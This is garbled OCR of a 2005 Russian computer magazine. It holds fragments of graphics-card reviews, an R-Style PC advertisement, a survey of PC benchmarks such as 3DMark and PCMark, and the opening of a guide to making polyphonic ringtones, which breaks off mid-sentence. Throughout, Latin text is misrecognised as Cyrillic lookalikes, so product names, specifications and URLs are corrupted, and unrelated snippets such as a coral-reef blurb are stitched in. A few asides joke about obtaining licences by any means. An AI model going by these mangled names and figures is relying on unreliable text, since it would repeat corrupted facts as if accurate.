Техпроцесс ядра, мкм: 0,1 1 



ѴІѴО: нет 



ПО в комплекте: отсутствует 



Сразу нужно объяснить тебе значение прис- 
тавки X в названии платы. Оно не имеет никако- 
го отношения к Салли и Малдеру. Знай же, что 
применительно к изделиям АЗІІЗ — это обозна- 
чение дешевой, просто максимально удешев- 
ленной платы. Почти ОЕМ-вариант, но в короб- 
ке. Кроме диска с драйверами и мануалом ты 
там ничего не найдешь. Базовая производи- 
тельность низкая, частота памяти тоже. Все 128 
Мб памяти упакованы в старый ТЗОР, шина 128 
бит, тип памяти ЭЭР1. Мягко говоря, не лучшие 
параметры. А уж о высокой латентности в 4 нс 
не хочется и говорить. Зато дешево. И хорошо 
разгоняется, а это наверняка привлечет внима- 
ние многих и сможет скрасить недостатки пла- 
ты. Ее чип имеет 8 пиксельных конвейеров, на 
ней установлены порты ЭѴІ и Э-ЗІІВ. В режиме 
СгоззТіге она работать не может. Возможно, ес- 
ли ты займешься ручным увеличением скорос- 
ти ее работы, тебе придется поменять установ- 
ленный вентилятор. Он какой-то невзрачный, не 
внушающий доверия. 



ІЙЭШЖ ЖУО© 
ЖѵшштІШ Мб 

Ядро: АТІ ВѴ410 

Кол-во пиксельных конвейеров, шт: 8 



Объем памяти, Мб: 128 

Частота ядра, МГц: 412 

Частота памяти, МГц: 307 (614) 



Тип памяти: РРВ-1, ТЗОР 



Латентность п 
Техпроцесс ядра, мкм: 0,1 1 



ѴІѴО: нет 



Разъемы: Р-ЗШВ, РѴІ, ТѴ-ОиІ 



ПО в комплекте: Ргіпсе о! Регзіа ТЬе Запсіз о! Тіте 2СР, 
Зрііпіег СеІІ Рапбога Тотоггоѵѵ РУР, СуЬегІіпк РоѵѵегРѴР 5 

Раз уж в этом тесте мы много внимания уделяем 
памяти наших устройств, то не будем отступать от 
традиции и сейчас. На этой стильной синей плате, 
выполненной в традиционном сапфировом дизай- 
не, установлено 128 Мб видеопамяти. Она имеет 
шину памяти шириной 128 бит, упакована в ТЗОР, а 
ее латентность составляет 3,3 нс. В общем, все до- 
вольно средненько. Пиксельных конвейеров в чи- 
пе восемь штук. Для подключения к компьютеру 
есть порты Э-ЗІІВ и ЭѴІ. Хорошее соотношение це- 
ны и производительности объясняется высокой 
скоростью платы и ее хорошей «разгонябель- 
ностью». Комплект поставки тут один из самых бо- 
гатых в обзоре. В него входят утилита для разгона, 
СуЬегШпк Роѵ/егЭѴЭ, а также игры Ргісе о і Регзіа: 
ТГіе Запсіз оПіте и ЗрІіпТег СеІІ: Рапбога Топпоггслл/. 
Так что с этой платой ты не соскучишься. Можешь 
рассматривать свое приобретение, даже неся 
его из магазина. А вот в СгоззИге ее не поставишь. 





Экосистема кораллового рифа является наиболее 
разнообразной и сложно устроенной во всей биосфере. 
Коралловые рифы служат домом для многочисленных 
видов рыб, крабов, моллюсков, червей, губок^и 
водорослей, обеспечивая их пищей и убежищем. 

Хотя коралловые рифы занимают менее 02% 
площади океанского дна, в их биоценозах 
обнаружена четверть всех известных 
животных и растений океана. 
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на базе процессора Іп 



іта МС-е 

іш® 4 560 с технологией НТ 



Разнообразие возможностей для отдыха, развлечений и самообразования 
дает развлекательный центр К-$1у1е® Ргохіта® МС-е. 

Благодаря мощным процессорам Іпіеі® Репііит® 4 560 с технологией НТ, 
он заменит Вам музыкальный центр, ЭѴБ-рекодер и компьютер. 


Краткие технические характеристики: 

Процессор Іпіеі® Репііит® 4 560 с технологией НТ 

Операционная система: Місгозой® Шпскж5® ХР Месііа Сепіег Есііііоп 2005 

Звук: поддержка стандарта БоІЬу Оі§ііа1 7.1 (до 8 каналов) 

ТѴ-тюнер: РАЬ/ЗЕСАМ 

Пульт дистанционного управления 

Комплект беспроводных устройств: клавиатура, манипулятор «мышь» 


Система качества проектирования, разработки и производства компании 
Р-Зіуіе Сотриіегз сертифицирована по международному стандарту 150 9001-2000. 




Астрахань ТАН (8512) 394-254 Братск Байт (395-3) 411-121 Владивосток Эр-Стайл ДВ (4232) 205-410 
Воронеж Элмар Трейд (0732) 512-018 Екатеринбург В-Зіуіе (3432) 616-086 Калининград Балтик 
Стайл +7(0112) 99-11-99, 99-11-98 Кострома ИТ-Проффесионал (0942) 626-903 Кемерово 
Конкорд ПРО (3842) 357-888 Краснодар ВСС Сотрапу (8612) 640-450 Красноярск ЛанСервис 
(3912) 75-12-91/92/93 Москва В-5іуІе Тгасііпд (095) 514-14-14, Компания В-5*уІе (095) 514-14-10, 
Профит-М (095) 786-77-37, Сибкон (095) 292-50-12 Нижний Новгород Эр-Стайл Волга (8312) 464-328, 
461-622 Новосибирск Эр-Стайл Сибирь (383-2) 661-167 Пермь Эр-Стайл Кама (3422) 107-445 
Петрозаводск Илвес (8142) 762-288 Петропавловск-Камчатский АМН (4152) 168-751 Ростов- 
на-Дону Эр-Стайл Дон (863) 252-48-13 Санкт-Петербург Эр-Стайл СПБ (812) 445-34-18/17 
Тамбов Гитон (0752) 719-754 Тула ПитерСофт-НТ (0872) 355-500 Уфа Онлайн (3472) 248-228 
Хабаровск Эр-Стайл ДВ регион (4212) 314-530 Якутск Эльф (4112)457333 


^ К* оіуіѲ 

СОМРІІТЕП5 

Оптовые поставки: ООО «Эр-Эс-Ай»: тел.: (095) 514-1419 
ѵѵѵѵѵѵ.гзі.ги 

Техническая поддержка: ЗАО «Эр-Стайл Компьютере»: 
тел.: (095) 514-1417; бесплатный телефон: 8-800-200-800-7 
ѵѵѵѵѵѵ.г-зіуіе-сотриіегз.ги 

Сделано в России. Сделано на совесть! 



Іпіеі, Іпіеі 1о§о, Іпіеі Іпзісіе, Іпіеі Іпзісіе 1о§о, Іпсеі Сепігіпо, Іпіеі Сепігіпо 1о§о, Сеіегоп, Іпсеі Хеоп, Іпіеі 8реесі8іер, Ііапіит, Репгіит, апсі Репііит III Хеоп аге ігасіетагкз ог ге§І8іегесІ ігасіетагкз о? Іпіеі Согрогаііоп ог Ій зиЬзісІіагіез іп сЬе ШкесІ 8іаіез апсі оіЬег соипігіез. 
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Сага о попугаях 

ЧТО ТЫ ЗНАЕШЬ О СВОЕЙ СИСТЕМЕ? НЕТ, МЫ 
НИСКОЛЬКО НЕ СОМНЕВАЕМСЯ В ТОМ, ЧТО 
ТЫ НАИЗУСТЬ ПОМНИШЬ НАИМЕНОВАНИЕ 
КАЖДОЙ ЖЕЛЕЗКИ И ГОТОВ ПРЕДОСТАВИТЬ 
ИСЧЕРПЫВАЮЩУЮ ИНФОРМАЦИЮ ДАЖЕ БУ- 
ДУЧИ РАЗБУЖЕННЫМ ПОСРЕДИ НОЧИ. НО 
ЭТО ВСЕ ТЕХНИЧЕСКИЕ ДЕТАЛИ, А КАК БЫТЬ 
С ОБЪЕКТИВНОЙ ОЦЕНКОЙ? I Окунев Дмитрий ака 
ѴѴіІсІРастап (\л/іІЦрастап@таіІ.ги) 

Тест-драйв популярных 
бенчмарков 

Частенько во время распития с друзьями 
очередной кружки пива разговоры о пре- 



лестях жизни так или иначе сводятся к ком- 
пьютерной теме, а там и до обсуждения та- 
чек недалеко. При этом вопрос «У кого кру- 
че?» так и остается открытым: у одного 
установлен мощный проц, у другого имеет- 
ся крутейшая видеокарта, третий и вовсе 
провел капитальный апгрейд. Чья же си- 
стема лучше покажет себя в деле, судить 
довольно сложно. К счастью, рассказать о 
своей производительности она может и са- 
ма, причем довольно подробно. Для этого 



созданы специальные программные паке- 
ты — бенчмарки. 



[бои без правил] Людям всегда было инте- 
ресно оценить, на что способен их комп. 
История бенчмарков уходит корнями дале- 
ко во времена 286 процессоров и ЕѲА-ви- 
деорежимов. Некоторые старожилы, на- 
верное, еще помнят программу ЗОВепсГі, 
выводившую на экран примитивную по ны- 
нешним меркам анимированную трехмер- 
ную модель компьютера и подсчитываю- 
щую в ней РРЗ. Частенько встречались так- 
же программы, вычислявшие индекс про- 
изводительности процессора и в виде про- 
стейшей диаграммы сравнивавшие его с 
другими системами. 

Общие принципы работы и назначение 
бенчмарков не изменились до сих пор, 
правда, эти проги разделились на нес- 
колько категорий. К первой относятся па- 
кеты, комплексно оценивающие твою си- 
стему: после запуска программа прогоня- 
ет один или несколько тестов и на основе 
полученных данных формирует числовой 
индекс производительности. Ну а что с ним 
делать, уже понятно — либо идти хвалиться 
перед друзьями, либо же стыдливо закрыть 
окно, деинсталлировать бенчмарк и за- 
быть о своем позоре до следующего ап- 
грейда :). Вторая категория — программы, 
предназначенные для тестирования от- 




дельных подсистем: видео, ди- На нашем диске ты най- 

сковых накопителей и т.д. По- №§9) дешь все описанные 
лезны они бывают, например, в статье бенчмарки. 

при приобретении новой же- 
лезки. Кроме того, с их помощью делается львиная доля обзоров 
девайсов в различных сетевых и бумажных изданиях (тот, что у те- 
бя сейчас в руках, — не исключение). 

В настоящее время бенчмарки стали причиной самых настоящих 
войн, участие в которых принимают компьютерные энтузиасты 
всех мастей. С появлением онлайновых баз результатов тестиро- 
ваний тысячи пользователей стали регулярно постить свои дости- 
жения в надежде побить тот или иной рекорд. Особенную попу- 
лярность это явление нашло у оверклокеров — ребят, активно за- 
нимающихся разгоном своих многострадальных систем. У них в 
дело идет все: элитные процы, ЗЫ-массивы видеокарт, самые до- 
рогие материнки, экстремальное охлаждение (часто — жидкий 
азот). И пулять бы на такой системе в третий Эоопп, так нет же, все 



[БЕНЧМАРК ДЛЯ СМАРТФОНОВ] 

Если в области производительности тачки похвалить- 
ся уже нечем, можешь обратить внимание на другие 
устройства. К примеру, пресловутый РиІигеМагк не так 
давно выпустил пакет ЗРМагк’04 — бенчмарк для 
смартфонов! Он содержит в себе, как ни странно, до- 
вольно неплохой ЗЭ-тест, а также целый спектр тестов 
на скорость выполнения различных телефонных за- 
дач: от работы со списком контактов до сжатия фото- 
графий с камеры в ЗРЕО. Так что если ты счастливый 
обладатель подобного девайса, почему бы не оценить 
и его возможности? 





это богатство разгоняется до максимально возможного преде- 
ла только для выжимания из бенчмарка лишней сотни, а то и 
тысячи баллов! Оправданно ли это? Посуди сам: побив оче- 
редной рекорд, счастливчик становится известен в самых ши- 
роких кругах и превращается в объект для всеобщего подра- 
жания. Честь и хвала прилагаются :). 

Но хватит уже теории, настала пора рассказать о самых популяр- 
ных на сегодняшний день бенчмарках. 

[ЗЭМагк] Если после прочтения в начале статьи слова «бенчмарк» 
на ум тебе сразу пришла ассоциация с ЗЭМагк, ты не ошибся — 
это действительно самый популярный тестовый пакет из всех ныне 
существующих. Разработан он финской компанией РиіигеМагк 
Согрогаііоп (на заре деятельности — МосІОпіоп.сот) для оценки 
производительности игровых приложений. Этот пакет уже давно 
является основным средством для сравнения целых систем и от- 
дельных их компонентов. Секрет успеха бенчмарка заключается 
в его простоте использования (оценить возможности своей тачки 
сможет даже ребенок) и отличном техническом исполнении. 
Здесь практически нет невзрачных графиков, диаграмм и тому по- 
добной чуши, зато имеется несложный, но исчерпывающий ин- 
терфейс, тест, состоящий из рендеринга нескольких умопомра- 
чительных по уровню графики сцен, и отдельная гордость разра- 
ботчиков — деморежим. Последний представляет собой клип — 
нарезку сцен из теста, положенную на саундтрек, — да такой, что 
увидевшие его впервые обычно запоминают зрелище надолго. 
Это неудивительно — каждая версия бенчмарка обычно техноло- 
гически представляет собой уровень игр следующего поколения, 
поэтому, кстати, на момент выхода очередной версии пакет не 
тормозит разве что на самых мощных системах :). Тем не менее, 
даже далекие от прелестей тестирования юзеры часто тратят 
драгоценные трафик и время на скачку программы только для то- 



го, чтобы узреть то самое легендарное ЗЭМагк'овое демо. 

Итак, первая версия пакета, о которой хотелось бы рассказать, 
— ЗЭМагк 2001 . Именно с ее выходом борьба за баллы (или «попу- 
гаи», как быстро окрестили единицу измерения производительно- 
сти юзеры) приобрела значительные масштабы. Запустив про- 
грамму, ты попадешь на главную панель, где расположено нес- 
колько кнопок: имя проекта, выбор необходимых тестов (для пол- 
ной картины хорошо бы оставить все), опции, графические на- 
стройки, запуск браузера результатов (он ставится отдельно от 
ЗЭМагк'ОІ), пакетный запуск для масштабного тестирования, а 
также меню возможных действий. Можно приступить непосред- 
ственно к тестированию, просмотреть демо или поиграть в гонки 
на основе одной из сцен бенчмарка. Последние, правда, стано- 



[ИГРЫ-ТЕСТЕРЫ] 

Чтобы оценить производительность компа, вовсе не 
обязательно прибегать к помощи специализированных 
пакетов. Многие хитовые игры (особенно основанные 
на мощных движках) оснащены встроенными сред- 
ствами бенчмаркинга. Оиаке 3, Ооопп 3, НаІМіІе 2, Раг 
Сгу — вот далеко не полный список самых популярных 
игр, используемых в качестве тестов. Обычно для это- 
го в них применяются специальные консольные коман- 
ды, а сам тест осуществляется на предварительно за- 
писанных демках. Чтобы не забивать голову длинными 
строками инициализации, советуем зайти по адресу 
ѵѵѵѵѵѵ.ЬепсМетаІІ.сот — там ты найдешь софтину, зна- 
комую со всеми подобными играми и полностью авто- 
матизирующую процесс измерения в них производи- 
тельности. 
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[внешний вид ЗйМагк’ОЗ сразу после запуска. Другие версии отличаются от него не сильно] 



вятся доступными только после регистрации, но разве для тебя 
это серьезная проблема? :) 

Сам тест состоит из четырех сцен: первая представляет собой вы- 
шеупомянутую гонку в футуристическом стиле со стрельбой, вто- 
рая — готический (ммм... готичненько! — Прим. ЬООЫік) боевик, 
повествующий о нападении на средневековую деревушку весь- 
ма недружелюбной барышни на драконе. Далее следует точная 
копия знаменитого эпизода из «Матрицы» — битва в зале с выно- 
сом плохих парней и разбиванием в щепки стен и колонн, а до- 
вершает это великолепие суперкрасивая (по тем временам) сце- 
на ІМаіиге. Последняя отличается от остальных не только графиче- 
ски, но и технологически. Именно благодаря ей ЗЭМагк'ОІ стал 
одним из немногих пакетов, для которых рекомендовалась видео- 
карта с поддержкой ЭігесіХ 8.0 (а точнее, только начавших тогда 
внедряться в чипсеты пиксельных шейдеров). 

После игровых сцен идет серия стандартных тестов на различные 
характеристики видеокарты. Смотреть там особо не на что, но на 
конечный результат их показания влияют довольно сильно. Кроме 
того, в конце возможна оценка качества изображения: програм- 
ма снимает скриншоты каждой из сцен, сравнивает их с эталон- 
ными, и все недочеты твоей видюхи сразу становятся заметны. 

По окончании теста бенчмарк выдает число — индекс производи- 
тельности твоего компа, который тут же можно залить на сервер 
для сравнения с результатами забугорных тестеров или просто 
сохранить на диск. На нынешних системах этот индекс давно пе- 
реваливает за десятки тысяч «попугаев» и, в общем-то, для оценки 
современного железа малопригоден. Исключение составляют 
ситуации, когда надо протестировать процессор — его произво- 
дительность ЗЭМагк'01 отражает очень даже хорошо. 

Выход ЭігесіХ 9.0 и соответствующих ему графических технологий 
сопроводился релизом новой версии знаменитого бенча — 
ЗЭМагк 2003. В этот раз финны постарались на славу: без видюхи с 
поддержкой ЭігесіХ 8.0 из четырех тестов запуститься мог лишь 
один, а чтобы увидеть четвертый, и вовсе требовалась дорогущая 
по тем временам железка, не понаслышке знакомая с новомодной 
девятой версией. Внешне интерфейс программы изменился мало: 
был убран оффлайновый браузер результатов, опции программы и 
графические настройки объединились в одно меню да слегка был 
подправлен дизайн. А вот тесты поразили всех в очередной раз — 
в то время как Ооопгі 3 с его шикарным освещением предстояло 
еще ждать и ждать, ЗЭМагк'ОЗ уже легко выдавал аналогичный уро- 
вень графики. Но обо всем по порядку: первый тест из пакета (един- 
ственный, запускающийся на древних картах с ЭігесіХ 7.0) напоми- 
нает продвинутый 
авиасимулятор — 
ничего сложного с 
точки зрения графи- 
ки, хотя выглядит все 
равно довольно впе- 
чатляюще. А вот 
дальше становится 
интереснее: второй 
тест — Ваіііе о? Ргох- 
усоп — настоящее 
испытание для твоей 
видеокарты по части 
расчета освещения 
и теней. Близкий по 
духу и уровню гра- 
фики к пресловутому 



Эоопгі 3, этот тест до сих пор ставит на колени добрую 
половину графических чипсетов. Следующая сцена ни- 
чуть не хуже предыдущей: она выдержана в стиле фэн- 
тэзи и рассказывает о приключениях девушки в неко- 
ем подобии библиотеки, а заканчивается все сраже- 
нием с двумя гоблинами. Привлекает сцена, в первую 
очередь, самой девушкой — дизайнеры, видимо, учли 
все замечания относительно предыдущей версии 
бенчмарка:). Если же рассмотреть ее прическу, то 
можно заметить, что каждый волос прорисован и ани- 
мирован по отдельности! 

Но самая впечатляющая — последняя сцена. Как и в 
ЗЭМагк'01, это опять природа, но уже в обработке Эі- 
гесіХ 9.0. Соответственно, качество воды и раститель- 
ности просто поразительное, общий стиль тоже не 
подкачал — четвертый тест из прошлой версии просто 
нервно курит в углу :). Данная версия ЗЭМагк'а активно 
юзается и по сей день, так что делаем соответствующие выводы. 
Позднейшая на данный момент версия пакета — ЗЭМагк'05 — вы- 
шла сравнительно недавно, но уже успела занять достойное ме- 
сто на харде любого уважающего себя железячника. Дизайн по 
сравнению с предыдущим «Марком» не изменился вообще, раз- 
ве что добавилась функция оценки качества фильтрации и пол- 
ноэкранного сглаживания, а также режим построения графиков. 
Сразу видно, что ребята из РиіигеМагк работают все больше для 
фронта профессиональных тестеров, хотя и о простых юзерах не 
забывают — ничто из старых опций тронуто не было. 

Технически на данный момент ЗЭМагк'05 просто идеален. Если у 
тебя до сих пор не дошли руки до покупки современной видео- 
карты с полноценной поддержкой ЭігесіХ 9.0, можешь даже не 
пытаться запустить этого монстра. Кстати говоря, для этой версии 
бенчмарка наконец-то было разработано собственное ядро — 
все предыдущие базировались на движке Мах-ЕХ компании Ре- 
тебу Епіегіаітепі, возможно, знакомому тебе по популярной 
игре Мах Раупе. Ставка была сделана уже не на количество про- 
гоняемых сцен в тесте, а на их качество. Всего их теперь три, при- 
чем первые две вызывают стойкое чувство дежавю: Реіигп іо Ргох- 
усоп — очередной сюжет на тему космических войн, только бо- 
лее динамичный и качественнее прорисованный, чем его предок. 
Далее мы видим зарисовку на тему природы — в этот раз ночь, и 
никаких водоемов. Детализация сцены впечатляет, ЕРЗ на картах 
среднего и низшего уровня убивает начисто :). А вот третий тест — 
это действительно что-то новенькое: перед нами разыгрывается 
нападение некоего подобия дракона на корабль, причем оба 
они предпочитают перемещаться не по воде, а по воздуху. 
Выглядит это презабавно, а количество задействованных технологий 
поражает воображение — немудрено, что даже на Ріі-епсІ видюхах 
количество кадров в секунду в этой сцене далеко не заоблачное. 
Если ты не знаком ни с одной версией ЗЭМагк, настоятельно реко- 
мендую посетить сайт ѵѵѵѵѵѵ.'ГиТигетагк.сот и исправить свою 
ошибку. На это как минимум стоит посмотреть, а там, глядишь, и в 
битву «попугаев» втянешься :). Главное условие: как бы ни были ши- 
роки возможности настройки, для сравнения с другими система- 
ми тестировать стоит исключительно на дефолтных — иначе про- 
падает весь смысл этого интересного занятия. 

[РСМагк 2004] Этот 
тестовый пакет, в от- 
личие от предыду- 
щих, на твоей видео- 
карте внимания не 
акцентирует. Ибо 
предназначен он 
для оценки произво- 
дительности тачки 
не в играх, а в рас- 
пространенных за- 
дачах вроде коди- 
рования аудио/ви- 
део, копирования 
файлов и т.д. Он не 
такой популярный 
по сравнению с 
именитым родствен- 
ником (да-да, авто- 
ры этого бенча — [много это или мало — ответ найдется на 
все те же горячие сервере РиіигеМагк] 




[такой вот несложный процесс тестирования у 
РСМагк’04] 
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финские парни), зато пользы от него куда больше. Игры играми, а 
все же чертовски обидно узнать, что в кодировании МРЗ абсо- 
лютно никакой по части ЗЭ комп соседа не по-детски уделы- 
вает твою холеную тачку. 

Если ты видел хотя бы одну версию ЗЭМагк, здешний дизайн ты уз- 
наешь моментально — функциональность даже немного упроще- 
на. Можно, разве что, выбрать количество проводимых тестов, уз- 
нать информацию о системе и поиграть с выводом результатов. 
Испытаний довольно много, и все их перечислять смысла нет, 
в дефолтный же набор входят тесты на многозадачность, деши- 
фрование файлов, конвертацию аудио, компрессию видео 
в ѴѴМѴ и ЭіѵХ, рендеринг ѴѴЕВ-страницы и простой ЗЭ-тест с 
расчетом физики падающих тел. По результатам, 
опять же, формируется балл, который можно напра- 
вить в общую базу на сервере разработчиков. В об- 
щем, это довольно полезный тест, достойный места 
в твоей софтовой коллекции. 

[адиатагк 3] Очередной игровой бенчмарк, из всех 
аналогичных продуктов наиболее близкий по попу- 
лярности к ЗЭМагк. Причина — немного иная напра- 
вленность теста. В то время как творение ЕиіигеМагк 
— чистой воды синтетика, то есть имитация несуще- 
ствующих приложений, показывающая, в основном, 
перспективы развития 30, Адиатагк 3 отражает ре- 
альную ситуацию в этой области. Все потому, что 
этот бенч создан на базе уже существующей игры 
Адиапох 2, имеющей довольно мощный и техноло- 
гичный движок. Здесь же его просто заставили выво- 
дить на экран большее количество полигонов 
и просчитывать усложненные шейдерные програм- 
мы, все остальное осталось практически без изме- 
нений. Сцены, демонстрируемые тестом, коротко 
можно описать как жизнь футуристического подвод- 
ного мира — сложность их очень высока, но эстети- 
ческого удовольствия они почему-то не доставляют. 

Хотя это и не главное. Нам, в конце концов, нужен 
результат. В лучших традициях игровых бенчмарков 
Адиатагк 3 снабжен, помимо режима тестирова- 
ния, еще и демкой. Правда, тут уже ни о какой динамике и ки- 
ношности речи не идет — до уровня любого ЗЭМагк она, опять 
же, явно не дотягивает. Зато по уровню профессиональности 
соперничать тест может, и еще как: настроек и режимов тести- 
рования тут уйма, а после приобретения (любым способом :)) 
соответствующей лицензии их станет еще больше — вплоть до 
автоматического снятия скриншотов. Интерфейс довольно 
прост. Он напоминает скорее меню какой-нибудь игры, чем 
серьезного тестового пакета. Полученные в программе резуль- 
таты можно выложить в интернет для сравнения или сохранить 
на хард. В последнем случае пригодится прилагаемый к Ади- 
атагк 3 документ ЕхсеІ с макросами, позволяющий детально 
проанализировать твои достижения. 

Как видишь, бенчмарк этот в хозяйстве очень полезен — иногда 
стоит не только смотреть в светлое будущее, но и оценивать си- 
туацию в настоящем, а с этим он справляется на все 100%. 

[20 ѴѴіпЬѳпсО 99 2.0] Вопреки названию, последняя версия это- 
го тестового пакета вышла не в 1999 году, а на два года позже. 
Тем не менее, популярности он не утратил до сих пор — творе- 



[НЕМНОГО ИСТОРИИ] 

Разумеется, мы описываем только последние, акту- 
альные сейчас версии бенчмарков. Но на всякий слу- 
чай упомянем, что ЗйМагк’ОІ — далеко не первый тест 
компании РиіигеМагк. В истории имели место также 
версии 99 и 2000, рассчитанные на технический уро- 
вень совсем древних версий ОігесІХ. Для тестера на 
сегодняшний день ценности они не представляют во- 
обще, но эстеты, в принципе, могут попробовать разы- 
скать их хотя бы ради просмотра деморежима. 
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[вполне нормальный результат. Правда, лучше не вспоминать о том, что ми- 
ровой рекорд в ЗйМагк’ОІ давно перевалил за 30 000] 



[тест МоІЬег Ыаіиге из ЗйМагк’ОЗ. Пофигу, что всего 13 РРЗ — оно того стоит!] 



ние компании Ш Эаѵіз Мебіа обладает целым набором полез- 
ных тестов и возможностей по их настройке и отлично справля- 
ется с оценкой современного железа. Пакет предназначен для 
тестирования любой подсистемы компьютера, будь то процес- 
сор, жесткие диски или графика. Что примечательно, тебе вов- 
се не обязательно иметь его в полном комплекте. К примеру, 
если нет необходимости тестировать видеосистему, просто 
скачай версию без соответствующих тестов — сэкономишь и 
деньги, и место на винте. Некоторые компоненты вообще по- 
ставляются исключительно отдельно — это СРІІМагк 99 и ІО Аи- 
сііо ѴѴіпЬепсП 99 (что они измеряют, догадайся сам). Тестов не 
много, а очень много — они поделены на группы и оцениваются 
по-разному. Какие-то оканчиваются подсчетом старых добрых 
баллов, другие выдают информацию в чистом виде: графики, 
значения различных параметров, скорости и т.д. Подход к их 
проведению очень грамотен. Например, в самом начале про- 
грамма может предложить перезагрузиться для чистоты ре- 
зультатов. В комплекте идет некоторое количество вспомога- 
тельного софта: дефрагментатор, менеджер загрузки, отклю- 
чающий лишние программы при запуске бенчмарка, а также 
просмотрщик сохраненных в родном формате результатов те- 
ста. Все это образует неслабый программный комплекс для те- 
стирования практически любого компонента твоего компа, на- 
чиная от скорости работы ІІЗВ-флешки и заканчивая полной 
оценкой производительность системы. 

[итог] Если тебя заинтересовал данный материал, значит, миро- 
вое сообщество бенчмаркеров как минимум имеет шанс запо- 
лучить в общую копилку еще один результат теста для обсужде- 
ния :). А вдруг дело этим не ограничится, и скоро чемпионы, 
имеющие лучшие результаты в общепризнанных тестах, получат 
очередного серьезного соперника? Все может быть, тем бо- 
лее, что мы затронули лишь верхушку айсберга, в действитель- 
ности же количество бенчмарков самых разных направленно- 
стей просто огромно. Хочешь узнать больше? Посети как-ни- 
будь на досуге ресурс \л/\л/\л/.ЬепсІ 1 то^кІ 1 ^.^и — там ты найдешь 
описанные нами тестовые пакеты и десятки других, местами то- 
же заслуживающих внимания © 



[хакер 07 [79] 05 > РС_20ИЕ 023] 








ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_ 2 СЖЕ РЕППІІМ НЬЮСЫ 





Рингтон своими 
руками 



ПОЛИФОНИЧЕСКИЕ МЕЛОДИИ НЫНЕ НЕ РОС- 
КОШЬ, А АТРИБУТ ЛЮБОЙ СОВРЕМЕННОЙ 
ТРУБКИ. МНОГИМ ИЗВЕСТНО, КАК НАЙТИ 
И ЗАКАЧАТЬ МНОГОГОЛОСНУЮ МЕЛОДИЮ 
В ТЕЛЕФОН. НО ЗАТО КАК ОТРЕДАКТИРО- 
ВАТЬ ИЛИ СОЗДАТЬ СВОЮ СОБСТВЕННУЮ 
ПОЛИФОНИЧЕСКУЮ МЕЛОДИЮ, ЗНАЮТ ДА- 
ЛЕКО НЕ ВСЕ! I Степан Ильин ака Зіер ($Тер@геаІ. хакер. ш) 



Руководство по созданию 
полифонических мелодий 

[без полифонии никуда] Для начала опре- 
делимся, что означает слово «полифония» в 
принципе. Если верить энциклопедиям, то 
полифония — это совместное и одновре- 
менное звучание нескольких голосов, не- 
зависимых друг от друга. Ни для кого не 
секрет, что существует несколько форма- 
тов полифонических мелодий. Каждый из 
них принципиально отличается от любого 
другого и несовместим с ним. Самое же 
противное заключается в том, что произво- 
дители встраивают в свои девайсы подде- 
ржку всего одного-двух (максимум — трех) 
форматов. Причем стандартов по этому по- 
воду нет: каждый использует то, что ему 
приходится по душе. 

[МЮІ] Безусловно, это наиболее популяр- 
ный формат полифонических мелодий, 
можно даже сказать, родоначальник поли- 
фонии. Известность, однако же, он получил 
значительно раньше. Дело в том, что МЮІ 
изначально был разработан для музыкан- 
тов и звукорежиссеров, которые сочиняют 
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[настройки исходного МЮІ-файла] 




т 



Если ты считаешь, что не 
обделен слухом и музы- 
кальным вкусом, попробуй 
создать свою мелодию сам. 
С нуля. Многочисленные 
программы типа ІпіеІІіЗсоге 
Роіуріюпіс (шшш.іпіеіііз- 
соге.пеі), Мобііе Мизіс 
Роіуріюпіс (шшш.сИдібоок- 
саве.сот) тебе в помощь! 



и пишут музыку на компьютере. 

По сути, эти файлы не содер- 
жат звуковой информации как 
таковой. Посмотри на размер 
любой МЮГшки — он равен 
всего 5-10, максимум — 100 ки- 
лобайтам. Это объясняется 
тем, что МЮІ-файл имеет специ- 
альную структуру, которая 
предназначена для хранения 
своеобразной нотной тетради. 

Каждая запись в этой структуре указывает МЮІ-модулю звуковой 
карты, каким образом надо воспроизводить тот или иной канал, 
какой именно инструмент или его разновидность должны звучать в 
данный момент. Выглядит это примерно так: «Сейчас на первой 
дорожке надо проигрывать басы, на второй закончить партию 
фортепиано и т.д.». Плюсы такого подхода очевидны: размеры 
МЮІ-файла воистину ничтожные, а все заботы о воспроизведении 
лежат на специальном чипе (аппаратный модуль, содержащий 
сэмплы различных инструментов) звуковой карты. Однако есть и 
ложка дегтя: один и тот же МЮІ-файл очень часто звучит совер- 
шенно по-разному на различных звуковых платах (и мобилах то- 
же), и это не может не огорчать. 

Формат МЮІ имеет несколько разновидностей, одна из них — $Р- 
МЮІ. Ее особенность заключается в специальной таблице, кото- 
рая дифференцирует дорожки (голоса) как основные и дополни- 
тельные. Это позволяет не только эффектно воспроизводить мело- 
дию на телефоне с 40 голосами полифонии, но и вполне сносно 
на старенькой мобиле со скромными 8-16 голосами. 



[ММР] При всей привлекательности формата МЮІ у него есть один 
существенный недостаток. На какие ухищрения не иди, а запих- 
нуть в него голосовую дорожку все равно не получится. Оно и по- 
нятно: соответствующих сэмплов попросту нет в базе звуковой 
карты. Да и быть, собственно говоря, не может. 

Чтобы исправить это упущение, компанией УатаПа был разрабо- 





тан формат ММР. Во многом он 
повторяет МЮІ, однако имеет 
свои особенности и, что самое 
главное, поддерживает звуко- 
вые (читай голосовые) вставки. 
Получилась та же самая МЮІ, 
но с голосовой дорожкой. Но 
это еще не все. Немногим поз- 
же были разработаны разно- 
видности этого формата: ММР+ 
ѴіЬго и ММР+1_Е0. О назначении 
даться по названию: первый обе< 
мелодии в такт музыке, а второй - 



Для того чтобы вырезать 
отрывок из любимой ком- 
позиции, совершенно нео- 
бязательно использовать 
сложные музыкальные ре- 
дакторы. С этой задачей на 
«отлично» справится мини- 
атюрная утилита трТгіт 
(ѵѵѵѵѵѵ.трігіт.сот). 

каждого из них несложно дога- 
зпечивает вибросопровождение 
- цветомузыку светодиодом. 




[МРЗ іеаі. ѴѴАѴ] Это тот самый формат, в котором ты на протяжении 
уже долгого времени хранишь бесчисленные гигабайты музыки. 
Наконец-то он добрался до мобильных телефонов, а это значит, что 
поставить любимую музыкальную композицию в виде телефонного 
звонка стало проще простого. Не надо ничего конвертировать — 
просто вырежи нужную часть композиции и залей на телефон. 



[конвертируем умело] Первое, что нужно выяснить, — какие имен- 
но форматы поддерживает твой телефон. Думаю, что проблем с 
этим возникнуть не должно. Официальный сайт и тьма онлайн-ма- 
газинов по продаже мобильников с лихвой обеспечат тебя под- 
робной информацией. После этого можно приступать непосред- 
ственно к процессу конвертирования. 



[МРЗ -> МЮІ] Опытные камрады не рекомендуют осуществлять это 
преобразование напрямую. Желательно пройти промежуточный 
